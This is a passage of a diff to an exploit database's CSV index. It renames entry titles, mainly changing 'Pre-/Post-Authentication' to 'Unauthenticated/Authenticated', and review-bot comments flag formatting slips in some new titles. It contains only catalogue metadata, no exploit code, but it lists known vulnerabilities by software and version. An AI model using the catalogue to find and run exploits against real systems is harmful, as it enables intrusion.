 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
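Review bot: The new description for id 7998 reads `Remote Arbitrary.PHP File Upload`, with no space before `.PHP`, while the sibling renames in this same commit (ids 7638 and 7909) use `Remote Arbitrary .PHP File Upload`. The description column is presumably what people search and filter on, so the odd-one-out spelling would be missed by a lookup for the normalised phrase. The added line should read `7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary .PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0`.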
@@ -7578,7 +7577,7 @@ id,file,description,date,author,platform,type,port
 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0
 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
-8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
+8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0
 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash",2009-02-13,"Juan Yacubian",hardware,dos,0
@@ -7619,7 +7618,7 @@ id,file,description,date,author,platform,type,port
 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0
 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0
 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash",2009-02-23,Skylined,multiple,dos,0
-8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Pre-Authentication",2009-02-23,ahmadbady,php,webapps,0
+8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0
 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution",2009-02-23,JosS,php,webapps,0
 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
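Review bot: The renamed description for id 8092, `zFeeder 1.6 - 'admin.php' Unauthenticated`, ends on a bare adjective and names no vulnerability class, so someone triaging from this index cannot tell what the entry covers. Every other "Unauthenticated" title in the visible hunks qualifies a noun (Denial of Service, Buffer Overflow), which suggests the blanket replacement of "Pre-Authentication" was applied here without rereading the result. The title should get the impact noun that matches the referenced advisory file, which this diff does not show, for example `'admin.php' Unauthenticated <impact per 8092.txt>`.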
@@ -7706,7 +7705,7 @@ id,file,description,date,author,platform,type,port
 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0
-8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authentication Denial of Service",2009-03-09,h00die,hardware,dos,0
+8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0
 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0
 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0
@@ -7729,7 +7728,7 @@ id,file,description,date,author,platform,type,port
 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0
 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0
-8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Post-Authentication Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
+8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",windows,dos,0
 8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0
 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0
 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0
@@ -7760,7 +7759,7 @@ id,file,description,date,author,platform,type,port
 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0
 8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0
-8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Post-Authentication) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
+8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - (Authenticated) Command Execution",2009-03-19,"Emory University",cgi,webapps,0
 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0
 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0
 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0
@@ -7786,7 +7785,7 @@ id,file,description,date,author,platform,type,port
 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0
 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
-8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
+8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0
 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0
 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
@@ -7796,7 +7795,7 @@ id,file,description,date,author,platform,type,port
 8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0
 8281,platforms/windows/dos/8281.txt,"Microsoft GdiPlus - EMF GpFont.SetData Integer Overflow (PoC)",2009-03-24,"Black Security",windows,dos,0
 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - (view.php id) SQL Injection",2009-03-24,x0r,php,webapps,0
-8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Post-Authentication) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
+8283,platforms/windows/remote/8283.c,"Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities",2009-03-24,"Jonathan Salwan",windows,remote,0
 8284,platforms/windows/remote/8284.pl,"IncrediMail 5.86 - (Cross-Site Scripting) Script Execution Exploit",2009-03-24,"Bui Quang Minh",windows,remote,0
 8285,platforms/multiple/dos/8285.txt,"Mozilla Firefox XSL - Parsing Remote Memory Corruption PoC (1)",2009-03-25,"Guido Landi",multiple,dos,0
 8287,platforms/php/webapps/8287.php,"PHPizabi 0.848b C1 HFP1-3 - Arbitrary File Upload",2009-03-25,EgiX,php,webapps,0
@@ -7862,7 +7861,7 @@ id,file,description,date,author,platform,type,port
 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
-8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post-Authentication Code Execution",2009-04-03,brain[pillow],php,webapps,0
+8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0
 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,php,webapps,0
 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0
 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0
@@ -7978,7 +7977,7 @@ id,file,description,date,author,platform,type,port
 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",windows,dos,0
 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0
 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0
-8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Pre-Authentication Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0
+8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",linux,dos,0
 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - '.torrent' Buffer Overflow",2009-04-17,"Michael Brooks",linux,local,0
 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0
 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0
@@ -7999,7 +7998,7 @@ id,file,description,date,author,platform,type,port
 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,windows,dos,0
-8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Post-Authentication Remote Denial of Service",2009-04-20,h00die,hardware,dos,0
+8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,hardware,dos,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0
@@ -8526,7 +8525,7 @@ id,file,description,date,author,platform,type,port
 9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - (index.php t) Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0
 9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
 9038,platforms/windows/local/9038.py,"HT-MP3Player 1.0 - '.ht3' Universal Buffer Overflow (SEH)",2009-06-29,His0k4,windows,local,0
-9039,platforms/multiple/remote/9039.txt,"Cpanel - (Post-Authentication) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
+9039,platforms/multiple/remote/9039.txt,"Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0
 9040,platforms/php/webapps/9040.txt,"Joomla com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0
 9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0
 9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - (login grabber) Multiple SQL Injection",2009-06-29,jmp-esp,php,webapps,0
@@ -8569,7 +8568,7 @@ id,file,description,date,author,platform,type,port
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
 9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off-by-One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié ",windows,dos,0
-9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Post-Authentication) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
+9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0
 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0
 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
@@ -8909,7 +8908,7 @@ id,file,description,date,author,platform,type,port
 9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0
 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0
 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0
-9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Post-Authentication Directory Traversal",2009-08-18,DSecRG,windows,remote,0
+9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0
 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
 9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0
@@ -9125,7 +9124,7 @@ id,file,description,date,author,platform,type,port
 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0
 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143
 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0
-9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Post-Authentication) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
+9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,windows,dos,0
 9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash",2009-09-14,cloud,hardware,dos,0
 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0
@@ -9147,7 +9146,7 @@ id,file,description,date,author,platform,type,port
 9685,platforms/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - (CreateStore) ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos,0
 9686,platforms/windows/dos/9686.py,"VLC Media Player < 0.9.6 - (CUE) Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos,0
 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0
-9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Post-Authentication) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
+9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - (Authenticated) (ping option) Command Injection",2009-09-15,r00t,hardware,local,0
 9689,platforms/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos,0
 9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) Universal",2009-09-15,hack4love,windows,remote,6660
 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos,0
@@ -9306,7 +9305,7 @@ id,file,description,date,author,platform,type,port
 9923,platforms/solaris/remote/9923.rb,"Solaris 8 dtspcd - Heap Overflow (Metasploit)",2002-06-10,noir,solaris,remote,6112
 9924,platforms/osx/remote/9924.rb,"Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)",2003-04-07,"H D Moore",osx,remote,139
 9925,platforms/osx/remote/9925.rb,"Apple QuickTime RTSP 10.4.0 < 10.5.0 (OSX) - Content-Type Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
-9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 - tinybrowser Arbitrary File Upload / Execute",2009-07-22,spinbad,php,webapps,0
+9926,platforms/php/webapps/9926.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload /Execution",2009-07-22,spinbad,php,webapps,0
 9927,platforms/osx/remote/9927.rb,"mDNSResponder 10.4.0 / 10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,anonymous,osx,remote,0
 9928,platforms/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,osx,remote,21
 9929,platforms/osx/remote/9929.rb,"Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",osx,remote,25
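Review bot: The new title for row 9926 ends in `Arbitrary File Upload /Execution`, with a space before the slash and none after it. The removed line and other titles in this index separate alternatives with ` / `. Suggest `"Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Execution"` so the description tokenises and matches like its neighbours.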
@@ -9372,7 +9371,7 @@ id,file,description,date,author,platform,type,port
 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0
 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21
-9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Authentication Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
+9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21
 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP Disclosure",2009-09-25,nitr0us,hardware,remote,0
 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80
 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0
@@ -9672,7 +9671,7 @@ id,file,description,date,author,platform,type,port
 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0
 10392,platforms/windows/local/10392.rb,"Millenium MP3 Studio 2.0 - '.pls' Universal Stack Overflow (Metasploit)",2009-12-11,dookie,windows,local,0
 10393,platforms/php/webapps/10393.txt,"B2C Booking Centre Systems - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0
-10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Pre-Authentication Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80
+10394,platforms/windows/remote/10394.py,"HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow",2009-12-12,"sinn3r and muts",windows,remote,80
 14948,platforms/php/webapps/14948.txt,"festos CMS 2.3b - Multiple Vulnerabilities",2010-09-09,Abysssec,php,webapps,0
 10395,platforms/php/webapps/10395.txt,"Miniweb 2.0 - Full Path Disclosure",2009-12-12,"Salvatore Fresta",php,webapps,0
 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0
@@ -10149,7 +10148,7 @@ id,file,description,date,author,platform,type,port
 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Arbitrary File Upload",2010-01-06,"wlhaan hacker",php,webapps,0
 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
-11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post-Authentication) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
+11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 and Simo36",novell,remote,0
 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT - Database Disclosure",2010-01-06,LionTurk,asp,webapps,0
 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery - SQL Injection",2010-01-06,FL0RiX,php,webapps,0
 11025,platforms/php/webapps/11025.txt,"AWCM - Database Disclosure",2010-01-06,alnjm33,php,webapps,0
@@ -10399,7 +10398,7 @@ id,file,description,date,author,platform,type,port
 11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0
 11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0
 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",windows,dos,0
-11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0
+11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Unauthenticated Denial of Service (PoC)",2010-02-07,loneferret,windows,dos,0
 11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0
 11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0
 11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0
@@ -10437,7 +10436,7 @@ id,file,description,date,author,platform,type,port
 11383,platforms/php/webapps/11383.txt,"HASHE! Solutions - Multiple SQL Injections",2010-02-10,"AtT4CKxT3rR0r1ST ",php,webapps,0
 11384,platforms/windows/local/11384.py,"WM Downloader 3.0.0.9 (Windows XP SP3) - PLS PLA Exploit",2010-02-10,"Beenu Arora",windows,local,0
 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) Cross-Site Scripting",2010-02-10,"Sioma Labs",php,webapps,0
-11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0
+11391,platforms/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,windows,dos,0
 11392,platforms/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",windows,dos,0
 11393,platforms/jsp/webapps/11393.txt,"Omnidocs - SQL Injection",2010-02-11,thebluegenius,jsp,webapps,0
 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - Cross-Site Scripting",2010-02-11,ROOT_EGY,php,webapps,0
@@ -10463,7 +10462,7 @@ id,file,description,date,author,platform,type,port
 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0
 11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (Remote File Inclusion / Local File Inclusion) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0
 11416,platforms/php/webapps/11416.txt,"Alqatari Group 1.0 - Blind SQL Injection",2010-02-12,Red-D3v1L,php,webapps,0
-11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Remote Exploit",2010-02-12,Lincoln,windows,remote,0
+11420,platforms/windows/remote/11420.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Exploit",2010-02-12,Lincoln,windows,remote,0
 11422,platforms/windows/remote/11422.rb,"Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow (Metasploit)",2010-02-12,Dz_attacker,windows,remote,0
 11424,platforms/php/webapps/11424.txt,"cms made simple 1.6.6 - Multiple Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
 11425,platforms/php/webapps/11425.txt,"daChooch - SQL Injection",2010-02-12,snakespc,php,webapps,0
@@ -10502,9 +10501,9 @@ id,file,description,date,author,platform,type,port
 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 - Local Buffer Overflow",2010-02-15,_SuBz3r0_,windows,local,0
 11466,platforms/php/webapps/11466.txt,"microUpload - Arbitrary File Upload",2010-02-15,Phenom,php,webapps,0
 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0
